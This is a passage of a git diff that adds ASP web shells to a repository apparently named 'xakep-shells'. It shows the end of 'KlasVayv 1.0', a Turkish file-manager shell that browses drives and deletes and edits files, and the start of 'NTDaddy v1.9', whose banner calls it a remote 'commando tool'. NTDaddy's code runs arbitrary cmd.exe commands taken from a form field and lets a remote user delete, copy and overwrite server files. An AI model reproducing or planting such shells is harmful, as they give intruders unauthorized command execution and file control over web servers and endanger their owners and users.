+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Klas�r</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="klasvayv.asp?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">�st Klas�r</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="klasvayv.asp?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">S�r�c�ler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klas�r</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;T�r</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Ad�</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;��lem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">A�</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="klasvayv.asp?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">D�zenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/ASP/ntdaddy.asp.txt b/xakep-shells/ASP/ntdaddy.asp.txt
new file mode 100644
index 0000000..bbcba0a
--- /dev/null
+++ b/xakep-shells/ASP/ntdaddy.asp.txt
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
+|     -obzerve : mr_o@ihateclowns.com |
+=======================================
+-->
+<%@ Language=VBScript %>
+<%Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If%>
+<% if request.form("flag")=""then %>
+<html>
+<head>
+<title>|[NTDaddy v1.9 - obzerve | fux0r inc.]</title>
+<%
+'Commands
+dim fs,f
+dim FilePath,FolderPath,FileTo,Cmd
+dim selFolder,FolderTo
+dim Tempmsg
+dim TempAtt
+dim TextOutput,TextWrite,TextFile,lblioMode,lblFormat,TextCreateFormat
+Const ForReading = 1, ForWriting = 2, ForAppending = 3
+Set fs = CreateObject("Scripting.FileSystemObject")
+FilePath=Request.Form("FileName")
+FolderPath=Request.Form("FolderPath")
+selFolder=Request.Form("FolderName")
+FolderTo=Request.form("CopyFolderTo")
+FileTo=Request.Form("CopyFileTo")
+Cmd=Request.Form("cmdOption")
+TextCmd=Request.form("cmdtxtFileOption")
+Select case Cmd
+case "DeleteFile"       
+fs.deletefile FilePath,TRUE
+response.write("File: " & FilePath & " has been deleted.")
+case "DeleteFolder"     
+fs.deletefolder selFolder,TRUE
+response.write("Folder: " & selFolder & " has been deleted.")
+FolderPath=Request.form("RefreshFolderPath")
+case "CopyFile"
+fs.CopyFile FilePath,FileTo, TRUE
+response.write("File: " & FilePath & " has been copied to " & FileTo & ".")
+case "CopyFolder"
+fs.CopyFolder selFolder,FolderTo, TRUE
+response.write("Folder: " & selFolder & " has been copied to " & FolderTo & ".")
+case "SetFileAttributes"
+on error resume next
+if FilePath <> "" then
+Set f = fs.GetFile(FilePath)
+select case f.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f.attributes
+end select
+end if  
+response.write("<form name=frmFileAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FileName Value=" & chr(34) & FilePath & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>File Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FileAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FileAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FileAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FileAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FileAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FileAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FileAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FileAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FileAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFileAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of File: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FileAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "SetFolderAttributes"
+on error resume next
+FolderPath=Request.form("RefreshFolderPath")
+if selFolder <> "" then
+Set f = fs.Getfolder(selFolder)
+select case f.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
